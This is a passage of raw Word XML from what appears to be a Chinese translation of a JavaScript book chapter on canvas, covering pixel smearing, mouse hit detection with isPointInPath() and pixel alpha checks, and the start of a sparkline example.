    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var col=1;col</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>width;col++,i+=4){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每一列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i]=(data[i]+data[i-4]*m)/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>像素中红色分量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i+1]=(data[i+1]+d</w:t>
      </w:r>
      <w:r>
        <w:t>ata[i-3]*m)/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>绿色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i+2]=(data[i+2]+data[i-2]*m)/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>蓝色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i+3]=(data[i+3]+data[i-1]*m)/n;//Alpha</w:t>
      </w:r>
      <w:r>
        <w:t>分量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在将涂抹过的图片数据复制回画布相同的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.putImageData(pixels,x,y);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要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样，同样收同源安全策略的限制：它对于绘制的图片（通过</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法直接绘制或者通过</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasP</w:t>
      </w:r>
      <w:r>
        <w:t>attern</w:t>
      </w:r>
      <w:r>
        <w:t>间接绘制）和画布所在文档不属于同源的画布是无效的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="545" w:name="21_4_15_Ming_Zhong_Jian_Ce_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>21.4.15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　命中检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isPointInPath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法确定一个指定的点是否落在（或者在边界上）当前路径中，如果该方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>则表示落在当前路径中，反之则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。传递给该方法的点是在默认坐标系中的而不是在变换过的坐标系中。这对于该方法用于命中检测（</w:t>
      </w:r>
      <w:r>
        <w:t>hit detection</w:t>
      </w:r>
      <w:r>
        <w:t>）是很有帮助的：检测鼠标单击事件是否发生在特定的形状上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是，不能将</w:t>
      </w:r>
      <w:r>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>clientX</w:t>
      </w:r>
      <w:r>
        <w:t>字段和</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>字段直接传递给</w:t>
      </w:r>
      <w:r>
        <w:t>isPoint</w:t>
      </w:r>
      <w:r>
        <w:t>InPath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。首先，必须要将鼠标事件的坐标转换成相应的画布元素，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。其次，如果画布在屏幕上显示的尺寸和实际尺寸不同，鼠标事件坐标必须要进行适当的缩放。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-11</w:t>
      </w:r>
      <w:r>
        <w:t>显示了一个工具函数，用它可以检测一个给定的</w:t>
      </w:r>
      <w:r>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>是否发生在当前路径上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-11</w:t>
      </w:r>
      <w:r>
        <w:t>：检测一个鼠标事件是否发生在当前路径上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果鼠标事件发生指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的当前路径上则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hitpath(context,event){//</w:t>
      </w:r>
      <w:r>
        <w:t>从＜</w:t>
      </w:r>
      <w:r>
        <w:t>ca</w:t>
      </w:r>
      <w:r>
        <w:t>nvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞对象中获取＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=context.canvas;//</w:t>
      </w:r>
      <w:r>
        <w:t>获取画布尺寸和位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bb=canvas.getBoundingClientRect();//</w:t>
      </w:r>
      <w:r>
        <w:t>将鼠标事件坐标通过转换和缩放变换成画布坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=(event.clientX-bb.left)*(canvas.width/bb.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>y=(event.clientY-bb.top)*(canvas.height/bb.height);//</w:t>
      </w:r>
      <w:r>
        <w:t>用这些变换后的坐标来调用</w:t>
      </w:r>
      <w:r>
        <w:t>isPointInPath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return context.isPointInPath(x,y);</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可能还会使用如下所示的</w:t>
      </w:r>
      <w:r>
        <w:t>hitpath()</w:t>
      </w:r>
      <w:r>
        <w:t>函数作为事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.onclick=function(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(hitpath(this.getContext("2d"),event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Hit!");//</w:t>
      </w:r>
      <w:r>
        <w:t>单击在当前路径上</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除了进行基于路径的命中检测之外，还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来检测鼠标点下的像素是否已经绘制过了。如果返回的像素（单个或多个）是完全透明的，则表示该像素上没有绘制任何内容，并且鼠标事件点空了。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-12</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何做此类命中检测。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-12</w:t>
      </w:r>
      <w:r>
        <w:t>：检测鼠标事件触发点的元素是否绘制过了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果指定的鼠标事件点下的像素不是透明的则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hitpaint(context,event){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过转换和缩放将鼠标事件坐标转换成画布坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=context</w:t>
      </w:r>
      <w:r>
        <w:t>.canvas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bb=canvas.getBoundingClientRect();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=(event.clientX-bb.left)*(canvas.width/bb.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=(event.clientY-bb.top)*(canvas.height/bb.height);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取像素（或者多个设备像素映射到一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素的像素）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pixels=c.getImageData(x,y,1,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果任何像素的</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值非</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>（命中）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>(var i=3;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>pixels.data.length;i+=4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pixels.data[i]!==0)return true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，表示不命中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="546" w:name="21_4_16_Hua_Bu_Li_Zi__Mi_Ni_Tu_"/>
      <w:r>
        <w:t>21.4.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　画布例子：迷你图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="546"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章将以一个实际的绘制迷你图的例子结束。迷你图（</w:t>
      </w:r>
      <w:r>
        <w:t>sparkline</w:t>
      </w:r>
      <w:r>
        <w:t>）是指用于显示少量数据的图形，通常会和嵌入在文本流中，如下所示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1177505" cy="159588"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81" name="00081.jpeg" descr="figure_0668_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1.jpeg" descr="figure_0668_0082"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1177505" cy="159588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>迷你图</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这个词是由作者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Edward </w:t>
      </w:r>
      <w:r>
        <w:t>Tufte</w:t>
      </w:r>
      <w:r>
        <w:t>杜撰的，他将该词用于描述</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>内嵌在文字、数字、图片中的小且高分辨率的图形</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。迷你图是数据密集、设计简单、单词大小的图形。（要了解更多关于迷你图的知识可以阅读</w:t>
      </w:r>
      <w:r>
        <w:t>Tufte</w:t>
      </w:r>
      <w:r>
        <w:t>的书：</w:t>
      </w:r>
      <w:r>
        <w:t>Beautiful Evidence[Graphics Press]</w:t>
      </w:r>
      <w:r>
        <w:t>。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-13</w:t>
      </w:r>
      <w:r>
        <w:t>展示了在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中用于实现迷你图的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，相对而言，该</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一个比较简单的常见</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码模块。代码中的注释解释了它的原理。要注意是的，它使用了例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-13</w:t>
      </w:r>
      <w:r>
        <w:t>：使</w:t>
      </w:r>
      <w:r>
        <w:t>用＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素绘制迷你图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>找到所有有</w:t>
      </w:r>
      <w:r>
        <w:t>"sparkline"CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类的元素，将它们的内容解析成一系列数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>最后替换成图形化的表示方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>将使用标记将迷你图定义成如下形式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span class="sparkline"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3 5 7 6 6 9 11 15</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>对迷你图进行样式设置，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*.sparkline{background-color:#ddd;color:red;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>迷你图的颜色是根据</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>color</w:t>
      </w:r>
      <w:r>
        <w:t>属性计算出来的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>迷你图是透明</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>因此可以显示正常的背景色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>data-height</w:t>
      </w:r>
      <w:r>
        <w:t>属性，迷你图的高度则由该属性指定，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有设置，则根据</w:t>
      </w:r>
      <w:r>
        <w:t>font-size</w:t>
      </w:r>
      <w:r>
        <w:t>属性计算得出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>data-width</w:t>
      </w:r>
      <w:r>
        <w:t>属性，迷你图的宽度则由该属性指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有设置该属性，而设置了</w:t>
      </w:r>
      <w:r>
        <w:t>data-dx</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则迷你图的宽度等于数据点的个数乘以</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*data-dx</w:t>
      </w:r>
      <w:r>
        <w:t>的值；否则，图表的宽度等于数据点的个数乘以图表的高度再除以</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>data-ymin</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>data-ymax</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则最小值和最大值由这两个属性值指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>否则，最小值和最大值等于数据的最小值和最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onLoad(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当文档第一次载入时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>找到所有有</w:t>
      </w:r>
      <w:r>
        <w:t>"sparkline"</w:t>
      </w:r>
      <w:r>
        <w:t>类的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elts=document.getElementsByClassName("sparkline");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>main:for(var e=0;e</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>elts.length;e++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=elts[e];//</w:t>
      </w:r>
      <w:r>
